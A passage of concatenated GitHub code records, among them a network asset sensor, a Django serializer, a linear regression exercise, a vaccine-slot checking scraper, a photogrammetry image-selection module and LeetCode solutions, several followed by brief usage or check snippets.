int(a)\n\t\t\tif session_size == 0:\n\t\t\t\tsession_size = 1024\n\t\tif o == '-T':\n\t\t\ttimeout = int(a)\n\n\tif interface and server_ip and server_port:\n\t\t# 接受通过环境变量传入的过滤设置\n\t\tif 'http_filter_code' in os.environ:\n\t\t\thttp_filter['response_code'] = list(set(filter(None, os.environ[\"http_filter_code\"].replace(\" \",\"\").split(\",\"))))\n\t\tif 'http_filter_type' in os.environ:\n\t\t\thttp_filter['content_type'] = list(set(filter(None, os.environ[\"http_filter_type\"].replace(\" \",\"\").split(\",\"))))\n\t\tbpf_filter += ' and not (host {} and port {}) and not (host 127.0.0.1 or host localhost) '.format(server_ip,server_port)\n\n\t\ttry:\n\t\t\t# work_queue = queue.LifoQueue(max_queue_size)\n\t\t\twork_queue = collections.deque(maxlen=int(max_queue_size))\n\t\t\t\n\t\t\tfor i in range(msg_send_thread_num):\n\t\t\t\tmsg_thread_obj = thread_msg_send(work_queue, msg_send_mode)\n\t\t\t\tmsg_thread_obj.setDaemon(True)\n\t\t\t\tmsg_thread_obj.start()\n\n\t\t\tif engine == 'PCAP':\n\t\t\t\tpcap_analysis(work_queue)\n\t\t\telif engine == 'TSHARK':\n\t\t\t\ttshark_analysis(work_queue)\n\n\t\texcept KeyboardInterrupt:\n\t\t\tprint('\\nExit.')\n\t\t\tos.kill(os.getpid(),signal.SIGKILL)\n\t\texcept :\n\t\t\ttraceback.print_exc()\n\telse:\n\t\tUsage()","repo_name":"DSO-Lab/passets-sensor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
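The thread_msg_send workers above spin on an empty collections.deque; a blocking queue.Queue removes the busy-wait. A small sketch of that pattern (not wired into the capture engine; the payload and the send step are placeholders):

import queue
import threading

work_queue = queue.Queue(maxsize=50000)

def sender(q):
    while True:
        msg = q.get()  # blocks instead of spinning while idle
        try:
            print('would send:', msg)  # stand-in for the TCP/HTTP/syslog send
        finally:
            q.task_done()

threading.Thread(target=sender, args=(work_queue,), daemon=True).start()
work_queue.put({'tag': 'demo'})
work_queue.join()  # returns once the demo message has been handled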
+{"seq_id":"12679565618","text":"from dj_rest_auth.registration.serializers import RegisterSerializer\nfrom dj_rest_auth.serializers import LoginSerializer\nfrom django.contrib.auth import get_user_model, models\nfrom drf_extra_fields.fields import Base64ImageField\nfrom drf_spectacular.utils import extend_schema_field\nfrom rest_framework import serializers\n\nfrom admin.utils import get_timestamp_path\nfrom users.models import CustomUser, Contact\n\n\nclass AuthLoginSerializer(LoginSerializer):\n username = None\n\n\nclass CustomRegisterSerializer(RegisterSerializer):\n username = None\n first_name = serializers.CharField(required=True, write_only=True)\n last_name = serializers.CharField(required=True, write_only=True)\n email = serializers.EmailField(required=True)\n password1 = serializers.CharField(required=True, write_only=True)\n password2 = serializers.CharField(required=True, write_only=True)\n is_builder = serializers.BooleanField(required=True)\n\n def custom_signup(self, request, user):\n user.is_builder = self.validated_data.get('is_builder', user.is_builder)\n user.save(update_fields=['is_builder'])\n\n def get_cleaned_data(self):\n return {\n 'first_name': self.validated_data.get('first_name', ''),\n 'last_name': self.validated_data.get('last_name', ''),\n 'password1': self.validated_data.get('password1', ''),\n 'email': self.validated_data.get('email', ''),\n 'is_builder': self.validated_data.get('is_builder', '')\n }\n\n\nclass ContactSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contact\n fields = ['id', 'first_name', 'last_name', 'phone', 'email']\n read_only_fields = ['id']\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n agent_contacts = ContactSerializer()\n avatar = Base64ImageField(required=False)\n\n def update(self, instance, validated_data):\n # Add your custom logic here for updating the instance\n # For example, you can update specific fields of the instance based on the validated_data\n if 'agent_contacts' in validated_data:\n contact = Contact.objects.get(user=instance)\n contact.email = validated_data['agent_contacts'].get('email', contact.email)\n contact.phone = validated_data['agent_contacts'].get('phone', contact.phone)\n contact.first_name = validated_data['agent_contacts'].get('first_name', contact.first_name)\n contact.last_name = validated_data['agent_contacts'].get('last_name', contact.last_name)\n contact.save()\n # You can also perform any additional custom operations\n instance.email = validated_data.get('email', instance.email)\n instance.phone = validated_data.get('phone', instance.phone)\n instance.avatar = validated_data.get('avatar', instance.avatar)\n instance.first_name = validated_data.get('first_name', instance.first_name)\n instance.last_name = validated_data.get('last_name', instance.last_name)\n instance.notification_type = validated_data.get('notification_type', instance.notification_type)\n instance.redirect_notifications_to_agent = validated_data.get('redirect_notifications_to_agent',\n instance.redirect_notifications_to_agent)\n instance.save()\n\n return instance\n\n class Meta:\n model = CustomUser\n fields = [\n 'id',\n 'first_name',\n 'last_name',\n 'phone',\n 'email',\n 'avatar',\n 'is_active',\n 'is_staff',\n 'last_login',\n 'date_joined',\n 'notification_type',\n 'agent_contacts',\n 'redirect_notifications_to_agent',\n 
]\n","repo_name":"DanilHushchyn/SwipeAPI","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
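A sketch of how the custom update() above is normally exercised from a view or shell (the user lookup and the payload are hypothetical; CustomUser and ProfileSerializer come from the modules in this record):

# Hypothetical usage; assumes a CustomUser with pk=1 and a related Contact.
user = CustomUser.objects.get(pk=1)
payload = {'first_name': 'Ada', 'agent_contacts': {'phone': '555-0100'}}
serializer = ProfileSerializer(user, data=payload, partial=True)
if serializer.is_valid():
    serializer.save()  # routes through ProfileSerializer.update() above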
+{"seq_id":"70530548842","text":"import numpy as np\n\nclass MyLinearRegression():\n \"\"\"\n Description:\n My personnal linear regression class to fit like a boss.\n \"\"\"\n\n def __init__(self, thetas, alpha=0.001, max_iter=1000):\n if not isinstance(thetas, np.ndarray) or thetas.size == 0:\n return None\n self.alpha = alpha\n self.max_iter = max_iter\n self.thetas = thetas\n\n def DataChecker(func):\n def wrapper(self, *args, **kwargs):\n for item in args:\n if not isinstance(item, np.ndarray)\\\n or not np.issubdtype(item.dtype, np.number):\n return None\n res = func(self, *args, **kwargs)\n return res\n return wrapper\n\n @DataChecker\n def fit_(self, x, y):\n\n X = np.insert(x, 0, 1, axis=1)\n for _ in range(self.max_iter):\n self.thetas = self.thetas - self.alpha\\\n * (X.T @ ((X @ self.thetas) - y)) / y.shape[0]\n\n return self.thetas\n\n @DataChecker\n def predict_(self, x):\n\n x = x.reshape(-1, 1) if len(x.shape) < 2 else x\n X = np.insert(x, 0, 1, axis=1)\n\n theta = self.thetas.reshape(-1, 1) if len(self.thetas.shape) < 2 else self.thetas\n\n if X.shape[1] != theta.shape[0] and theta.shape != (2, 1):\n return None\n\n return X @ theta\n\n @DataChecker\n def loss_elem_(self, y, y_hat):\n\n return (y - y_hat)**2\n\n @DataChecker\n def loss_(self, y, y_hat):\n\n return float(sum((y - y_hat)**2)/(2 * y.shape[0]))\n\n @staticmethod\n def mse_(y, y_hat):\n\n return float(sum((y - y_hat)**2)/(y.shape[0]))\n\nif __name__ == '__main__':\n import math\n import numpy as np\n from my_linear_regression import MyLinearRegression as MyLR\n x = np.array([[12.4956442], [21.5007972], [31.5527382], [48.9145838], [57.5088733]])\n y = np.array([[37.4013816], [36.1473236], [45.7655287], [46.6793434], [59.5585554]])\n lr1 = MyLR(np.array([[2], [0.7]]))\n\n # Example 0.0:\n y_hat = lr1.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[10.74695094],\n ## [17.05055804],\n ## [24.08691674],\n ## [36.24020866],\n ## [42.25621131]])\n\n # Example 0.1:\n print(lr1.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[710.45867381],\n ## [364.68645485],\n ## [469.96221651],\n ## [108.97553412],\n ## [299.37111101]])\n\n # Example 0.2:\n print(lr1.loss_(y, y_hat), '\\n')\n # Output:\n ## 195.34539903032385\n\n # Example 1.0:\n lr2 = MyLR(np.array([[1], [1]]), 5e-8, 1500000)\n lr2.fit_(x, y)\n print(lr2.thetas, '\\n')\n # Output:\n #array([[1.40709365],\n #[1.1150909 ]])\n\n # Example 1.1:\n y_hat = lr2.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[15.3408728 ],\n ## [25.38243697],\n ## [36.59126492],\n ## [55.95130097],\n ## [65.53471499]])\n\n # Example 1.2:\n print(lr2.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[486.66604863],\n ## [115.88278416],\n ## [ 84.16711596],\n ## [ 85.96919719],\n ## [ 35.71448348]])\n\n # Example 1.3:\n print(lr2.loss_(y, y_hat), '\\n')\n # Output:\n ## 80.83996294128525\n","repo_name":"BenElhadj/42-Piscine-ML","sub_path":"ML01/ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
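The gradient-descent fit_() above should approach the closed-form least-squares solution, so the normal equation gives a quick cross-check on the same sample data (sketch):

import numpy as np

x = np.array([[12.4956442], [21.5007972], [31.5527382], [48.9145838], [57.5088733]])
y = np.array([[37.4013816], [36.1473236], [45.7655287], [46.6793434], [59.5585554]])
X = np.insert(x, 0, 1, axis=1)

# theta = (X^T X)^-1 X^T y; pinv keeps this stable if X^T X is near-singular.
theta_exact = np.linalg.pinv(X.T @ X) @ X.T @ y
print(theta_exact)  # compare with lr2.thetas after fit_()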
+{"seq_id":"39885873059","text":"# -*- coding: utf-8 -*-\nfrom gluon import *\n\n\ndef Fase_Table(db, T):\n db.define_table('Fase',\n Field('numero', 'integer',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un numero de identificacion')],\n label='Numero'),\n Field('plan_trabajo', 'reference Plan_Trabajo',\n label='Pasantía (*)',\n writable=False),\n Field('objetivo_especifico', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un objetivo')],\n label='Objetivo Específico'),\n Field('descripcion', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario una Descripcion')],\n label='Descripción'),\n format=lambda r: '%s - %s' % (r.numero, r.objetivo_especifico)\n )\n","repo_name":"cadena-si-usb/SPE","sub_path":"applications/SPE_lib/modules/db_6_Fase.py","file_name":"db_6_Fase.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70334218604","text":"# Official docs: https://learning-pytest.readthedocs.io/zh/latest/doc/fixture/intro.html\n\nimport pytest\n\n'''\n@pytest.fixture(scope='session', autouse=True)\ndef fixture_session():\n    print('\\nAll test cases start (session) ####################')\n    yield\n    print('\\nAll test cases end (session) ####################')\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef fixture_function():\n    print('\\nEach test case starts (function) ####################')\n    yield\n    print('\\nEach test case ends (function) ####################')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef fixture_module():\n    print('\\nEach module test cases start (module) ===================>')\n    yield\n    print('\\nEach module test cases end (module) ===================>')\n\n\n@pytest.fixture(scope='class', autouse=True)\ndef fixture_class():\n    print('\\nEach class test cases start (class) ===================>')\n    yield\n    print('\\nEach class test cases end (class) ===================>')\n\n\n'''\n\n@pytest.fixture(scope='session', name='lg')\ndef login_and_loginout():\n    print(\"\\nLogging in to xxxxxx, getting token...\")\n    token = '9999999'\n    yield token\n    print('\\nLogged out ####################')\n\n\n\n","repo_name":"loomz/testcase_time_geek","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
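A sketch of a test consuming the session fixture above through its name='lg' alias (hypothetical test file, e.g. test_login.py):

def test_token_is_issued(lg):
    # `lg` is the value yielded by login_and_loginout().
    assert lg == '9999999'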
+{"seq_id":"13798745406","text":"import time\nimport urllib.parse\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nimport requests\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\nfrom checker.common.report_object import ReportObject\nfrom checker.common.setup_logger import logger\nfrom checker.common.session_object import SessionObject\nfrom checker.common.twilio_notifier import TwilioNotifier\n\nfrom dotenv import load_dotenv\n\nfrom checker.exception.login_exception import LoginExpiredException\nfrom checker.exception.token_exception import TokenExpiredException\n\nload_dotenv()\n\nclass KaiserNorCal:\n\n LOGIN_REQUEST = 'https://mydoctor.kaiserpermanente.org/ncal/appointments/#/selectFacility/covid19-vaccination/dose1-evisit'\n FACILITIES_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_DELETE = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/slot-locks'\n\n def __init__(self):\n self.name = \"Kaiser Northern California\"\n self.session = SessionObject()\n self.facilities = []\n\n ##-------------------------------\n ## EXECUTE\n ##-------------------------------\n\n def execute(self):\n start = time.perf_counter()\n\n report = ReportObject()\n report.strategy = self.name\n\n #build the session here\n if not self.session.is_active():\n #if login is expired, we should probbaly build both\n if not self.session.is_login_active():\n logger.info('building full session...')\n if self.do_login(True):\n self.get_facilities()\n else:\n logger.warning('unable to build login')\n if not self.session.is_token_active():\n logger.info('refreshing token...')\n self.get_facilities()\n\n #start processing - at this point we hopefully have a valid session\n if self.session.is_active():\n logger.info('making requests...')\n for facility in self.facilities:\n status = self.check_slots_by_facility(facility)\n report.add_facility(facility, status)\n else:\n logger.warning('session was not active, something happened')\n\n end = time.perf_counter()\n\n report.duration=end-start\n logger.info(report.to_string())\n\n return report\n\n ##-------------------------------\n\n def check_slots_by_facility(self, facility_code):\n logger.debug('checking for slots in facility '+ facility_code)\n #hit facility\n status = self.request_slots(facility_code)\n\n #if there is a slot - open browser, force cookies\n if status==1:\n self.get_appointment()\n else:\n #delete the appointment\n self.delete_appointment()\n\n return status\n\n ##-------------------------------\n ## HELPER METHODS\n ##-------------------------------\n\n def do_login(self, is_headless):\n login_u = os.getenv('KAISER_LOGIN')\n login_p = os.getenv('KAISER_PASSWORD')\n browser_path = os.getenv('PATH_TO_FIREFOX_DRIVER')\n\n #set the time when i rebuild this\n self.created_at=time.time()\n self.session.set_login(login_u)\n\n opts = Options()\n opts.headless = is_headless\n browser = Firefox(options=opts, executable_path=browser_path)\n browser.get(self.LOGIN_REQUEST)\n\n login_username_field = browser.find_element_by_id('username')\n login_username_field.send_keys(login_u)\n login_password_field = 
browser.find_element_by_id('password')\n login_password_field.send_keys(login_p)\n\n login_submit = browser.find_element_by_id('sign-on')\n login_submit.submit()\n\n # need the browser to load the my doctor online page\n delay = 5\n try:\n WebDriverWait(browser, delay).until(EC.presence_of_element_located((By.ID, 'member-select-id')))\n logger.debug('Page loaded.')\n except TimeoutException:\n logger.warning('Loading took too long...')\n return False\n\n self.session.set_cookies_raw(browser.get_cookies())\n logger.debug(f\"COOKIE: {self.session.cookies}\")\n\n if is_headless:\n browser.close()\n\n #TODO: need to create a condition where the login doesnt work\n\n return True\n\n ##-------------------------------\n\n def get_facilities(self):\n logger.debug('getting facility list and token...')\n\n headers = {'Cookie': self.session.cookies}\n\n try:\n response = requests.get(self.FACILITIES_REQUEST, headers=headers)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n #most likely login is out of date\n raise LoginExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n\n if 'token' in t:\n token = t['token']\n logger.debug(f\"TOKEN: {token}\")\n self.session.set_token(token)\n\n return t\n else:\n logger.warning('Response for facilities was empty')\n\n return None\n\n\n ##-------------------------------\n\n def request_slots(self, facility):\n logger.debug('requesting slots for '+ facility)\n\n sd = time.strftime('%d/%m/%Y')\n sd_str = urllib.parse.quote_plus(sd)\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n params['showFirstAvailable'] = 'true'\n params['startDate'] = sd_str\n params['bookingGuideline'] = 'COVIDVACCINE'\n\n uri = f\"{self.SLOT_REQUEST}/{facility}/slot-locks\"\n headers = {'Cookie': self.session.cookies, 'Content-Type': 'application/json'}\n\n try:\n response = requests.post(uri, headers=headers, params=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n # most likely login is out of date\n raise TokenExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n if not t['slots']:\n logger.info(f\"No slots available at: {facility}\")\n return 0\n else:\n logger.info(t)\n\n appointmentList = []\n for sl in t['slots']:\n appt = f\"* {sl['facilityName']} at {sl['appointmentDate']} {sl['appointmentTime']}\"\n appointmentList.append(appt)\n\n logger.info(f\"SLOTS AVAILABLE: {facility}\")\n TwilioNotifier.send_notification(f\"Vaccine slot(s) at {facility} - {'|'.join(appointmentList)}\")\n return len(appointmentList)\n\n logger.warning(f\"Response for slots at {facility} was empty\")\n return -1\n\n ##-------------------------------\n\n def delete_appointment(self):\n logger.debug('cleaning up appointments related to token...')\n\n headers = {'Cookie': self.session.cookies}\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n\n 
try:\n            response = requests.delete(self.SLOT_DELETE, headers=headers, params=params)\n        except requests.exceptions.HTTPError as errh:\n            logger.error(\"Http Error: %s\", errh)\n        except requests.exceptions.ConnectionError as errc:\n            logger.error(\"Error Connecting: %s\", errc)\n        except requests.exceptions.Timeout as errt:\n            logger.error(\"Timeout Error: %s\", errt)\n        except requests.exceptions.RequestException as err:\n            logger.error(\"Oops: Something Else: %s\", err)\n\n    ##-------------------------------\n\n    def get_appointment(self):\n        self.do_login(False)\n        self.delete_appointment()","repo_name":"macgngsta/python-product-checker","sub_path":"checker/strategy/kaiser_norcal_strategy.py","file_name":"kaiser_norcal_strategy.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
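execute() above refreshes the login and token proactively, while the readers raise LoginExpiredException / TokenExpiredException when a request still hits stale credentials. One way a caller could turn those exceptions into refresh-and-retry (a sketch only, not how the shipped execute() is written):

def check_with_refresh(checker, facility):
    try:
        return checker.check_slots_by_facility(facility)
    except TokenExpiredException:
        checker.get_facilities()  # re-fetching facilities also renews the token
        return checker.check_slots_by_facility(facility)
    except LoginExpiredException:
        if checker.do_login(True):  # full headless re-login
            checker.get_facilities()
            return checker.check_slots_by_facility(facility)
        return -1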
+{"seq_id":"18864913870","text":"def isBodyValid(body):\r\n    keyList = ['id', 'player', 'position']\r\n    subkeyList = ['x', 'y']\r\n    # Short-circuiting 'and' keeps the original check order and only\r\n    # reads body['position'] after its presence has been confirmed.\r\n    return (len(body) == 3\r\n            and all(key in body for key in keyList)\r\n            and all(subkey in body['position'] for subkey in subkeyList)\r\n            and 0 <= body['position']['x'] < 3\r\n            and 0 <= body['position']['y'] < 3)","repo_name":"ftcRibeiro/jogoDaVelha","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"24429859531","text":"name = \"qualityCheck\"\n\nversion = \"0.0.0\"\n\nauthors = [\"ArtFx TD gang\"]\n\ndescription = \\\n \"\"\"\n Python maya Packages.\n Use to converse with Maya dcc\n \"\"\"\n\nrequires = [\n \"python\",\n \"checkLib\",\n \"PySide2\",\n \"shiboken2\"\n]\nvcs = \"git\"\n\n\ndef commands():\n global env\n env.PATH.append(\"{root}/lib\")\n env.PYTHONPATH.append(\"{root}/lib\")\n\n\ntests = {\n \"unit\": \"python -m unittest discover -s {root}/tests\",\n \"lint\": {\n \"command\": \"pylint scripts\",\n \"requires\": [\"pylint\"],\n \"run_on\": [\"default\", \"pre_release\"]\n },\n \"maya\": {\n \"command\": \"mayapy {root}/tests/qualitycheck_test.py\",\n \"requires\": [\"maya\"],\n \"run_on\": \"explicit\"\n },\n}\n","repo_name":"Soulayrol/Pipeline","sub_path":"packages/artfx/qualityCheck/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"6244569144","text":"from multiprocessing import Pool, cpu_count\nimport numpy as np\nimport os, imghdr\nfrom shutil import copy\nimport pandas as pd\nfrom time import sleep\nfrom scipy.spatial import distance_matrix\nfrom PyQt5 import QtCore\n\nimport CHUBACAPP.utils.pyvista_utils as pv_utils\nimport CHUBACAPP.utils.sfm as sfm\nimport CHUBACAPP.post_reprojection.permutator as pm\nimport CHUBACAPP.blender.blender_reprojection as brp\nimport CHUBACAPP.utils.export_annotations as exp_tools\n\n\nclass DISThread(QtCore.QThread):\n \"\"\"Detects the blurry image and store their reference for later suppression\"\"\"\n prog_val = QtCore.pyqtSignal(int)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, sfm_path, model_path, camera_model, img_path, method):\n super(DISThread, self).__init__()\n self.running = True\n self.sfm_path = sfm_path\n self.model_path = model_path\n self.camera_model = camera_model\n self.img_path = img_path\n self.method = method\n\n def run(self):\n disjoint_image_selection(self.sfm_path, self.model_path, self.camera_model, self.img_path, self.method, self)\n\n\ndef disjoint_image_selection(sfm_path, model_path, camera_model, img_path, method, thread=None):\n dist_filter = 12\n\n output_path = os.path.join(img_path, \"disjoint_img_selection\")\n isExist = os.path.exists(output_path)\n if not isExist:\n os.makedirs(output_path)\n\n print(\"Initiating...\")\n if thread is not None:\n thread.prog_val.emit(round(0))\n\n sfm_data = sfm.sfm_data_handler(sfm_path, None, True)\n camera_points = sfm.extract_camera_points(sfm_data)\n dm = camera_points_distance_matrix(camera_points)\n list_img_model = camera_points['filename'].unique()\n list_img = list_image_in_model(img_path, list_img_model)\n print(\"Done !\")\n\n print(\"Getting image bound... {} images to reproject\".format(len(list_img)))\n json_path = get_bounds(list_img, sfm_path, model_path, output_path, camera_model)\n print(\"Done !\")\n\n print(\"Getting contact matrix...\")\n M, volumes = contact_matrix(json_path, dm, dist_filter, thread)\n pd.DataFrame(M).to_csv(os.path.join(output_path, 'contact_matrix.csv'), index=False, header=False)\n print(\"Done !\")\n\n print(\"Image selection...\")\n if method == \"Forward\":\n keep = pm.forward(M)\n elif method == \"permutations\":\n keep = pm.permutate(M)\n else:\n print(\"Not a valid method, aborting...\")\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 0\n print(\"Done !\")\n\n pv_utils.save_volumes(volumes, keep, output_path)\n filter_images(img_path, keep, volumes)\n print(\"Saved !\")\n\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 1\n\n\ndef contact_matrix(json_path, dm, dist_filter, thread=None):\n annotations = pv_utils.parse_annotation(json_path)\n ann_volumes = []\n if thread is not None:\n thread.prog_val.emit(0)\n prog = 0\n tot_len = len(annotations)\n for annotation in annotations:\n if thread is not None:\n thread.prog_val.emit(round((prog / tot_len) * 100))\n prog += 1\n if annotation[0] == 'bound' and len(annotation[1]) != 1:\n mesh = pv_utils.points_to_mesh(annotation[1])\n volume = pv_utils.get_volume(mesh)\n filename = annotation[2]\n ann_volumes.append([filename, volume])\n\n print(\"Starting contact analysis... 
{} images to analyse\".format(len(ann_volumes)))\n contact_matrix = np.zeros(shape=(len(ann_volumes), len(ann_volumes)))\n if thread is not None:\n thread.prog_val.emit(0)\n tot_len = len(ann_volumes)\n for i in range(len(ann_volumes)):\n if thread is not None:\n thread.prog_val.emit(round((i / tot_len) * 100))\n for j in range(len(ann_volumes)):\n if dm[i, j] < dist_filter:\n k, intersection = ann_volumes[i][1].collision(ann_volumes[j][1], 1)\n if intersection:\n contact_matrix[i, j] = 1\n print(\"Done !\")\n\n return contact_matrix, ann_volumes\n\n\ndef camera_points_distance_matrix(camera_points):\n positions = []\n for index, row in camera_points.iterrows():\n positions.append([float(row['x']), float(row['y']), float(row['z'])])\n\n dm = distance_matrix(positions, positions)\n return dm\n\n\ndef multi_process_reprojection(args):\n sfm_path, model_path, list_imgs, camera_model, annotations, i = args\n sleep(i * 10) # avoid problems in json read\n ann23d = brp.annotationsTo3D(sfm_path, model_path, list_imgs, camera_model)\n\n polygon = []\n for image in list_imgs:\n result = ann23d.reproject(annotations, image, False)\n polygon.extend(result[2])\n\n return polygon\n\n\ndef get_bounds(list_imgs, sfm_path, model_path, output_path, camera_model):\n multipro = True\n annotations = pd.DataFrame(\n columns=['filename', 'shape_name', 'points', 'label_name', 'label_hierarchy', 'annotation_id'])\n\n nb_processes = cpu_count()\n img_list_split = np.array_split(list_imgs, nb_processes)\n args = []\n i = 0\n for img_list_i in img_list_split:\n args.append([sfm_path, model_path, img_list_i, camera_model, annotations, i])\n i += 1\n\n if multipro:\n print(\"Starting multiprocessing reprojection...\")\n results = list(Pool(nb_processes).map(multi_process_reprojection, args))\n print(\"Done !\")\n\n else:\n results = []\n for arg in args:\n results.append(multi_process_reprojection(arg))\n\n polygon = []\n for result in results:\n polygon.extend(result)\n\n json_path = exp_tools.save_bounds_polygons(output_path, polygon)\n\n return json_path\n\n\ndef filter_images(data_path, keep, volumes):\n img_to_keep = []\n for i in range(len(volumes)):\n if keep[i]:\n img_to_keep.append(volumes[i][0])\n\n select_path = os.path.join(data_path, \"disjoint_img_selection\")\n isExist = os.path.exists(select_path)\n if not isExist:\n os.makedirs(select_path)\n\n for file in os.listdir(data_path): # for each image in the directory\n if os.path.isfile(os.path.join(data_path, file)): # Check if is a file\n if imghdr.what(os.path.join(data_path, file)) == \"jpeg\":\n if file in img_to_keep:\n copy(os.path.join(data_path, file), select_path)\n\n\ndef list_image_in_model(dir, img_in_model):\n list_img = []\n for file in os.listdir(dir): # for each image in the directory\n if os.path.isfile(os.path.join(dir, file)): # Check if is a file\n if imghdr.what(os.path.join(dir, file)) == \"jpeg\":\n if file in img_in_model:\n list_img.append(file)\n return list_img\n","repo_name":"marinmarcillat/CHUBACAPP","sub_path":"CHUBACAPP/post_reprojection/no_overlap.py","file_name":"no_overlap.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"24983499100","text":"\"\"\"\nBitmask state compression + prefix XOR counts\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n    def wonderfulSubstrings(self, word: str) -> int:\n        # dic counts how often each letter-parity mask has occurred\n        # among the prefixes seen so far (empty prefix => mask 0).\n        dic = Counter([0])\n        ans = 0\n        mask = 0\n\n        for ch in word:\n            step = ord(ch) - ord('a')\n            mask ^= (1 << step)\n            # Substrings where every letter count is even.\n            if mask in dic:\n                ans += dic[mask]\n            # Substrings where exactly one letter count is odd.\n            for i in range(10):\n                pre_mask = mask ^ (1 << i)\n                if pre_mask in dic:\n                    ans += dic[pre_mask]\n            dic[mask] += 1\n        \n        return ans","repo_name":"thorseraq/leetcode-playground","sub_path":"python/进阶/5799. 最美子字符串的数目.py","file_name":"5799. 最美子字符串的数目.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
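A quick sanity check of the prefix-XOR counting, using the two standard examples for this problem (assumes the Solution class above is importable):

s = Solution()
print(s.wonderfulSubstrings('aba'))   # expected 4
print(s.wonderfulSubstrings('aabb'))  # expected 9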
+{"seq_id":"42833107081","text":"from django.contrib import admin\nfrom .models import Movie\n\nclass MovieList(admin.ModelAdmin):\n list_display = ('name', 'year', 'description', 'rating')\n list_filter = ('name', 'year', 'rating')\n search_fields = ('name', 'description')\n ordering = ['year']\n\n\nadmin.site.register(Movie, MovieList)\n\n","repo_name":"boboyan/assignment2part2","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"31098267215","text":"class Solution:\n def minAddToMakeValid(self, S: str) -> int:\n uncom = 0\n toadd = 0\n for c in S:\n if c == '(':\n uncom += 1\n else:\n if uncom == 0:\n toadd += 1\n else:\n uncom -= 1\n return uncom + toadd\n\nif __name__ == \"__main__\":\n print(Solution().minAddToMakeValid('))(())('))\n\n","repo_name":"johnxguo/leetcode","sub_path":"921/921.py","file_name":"921.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
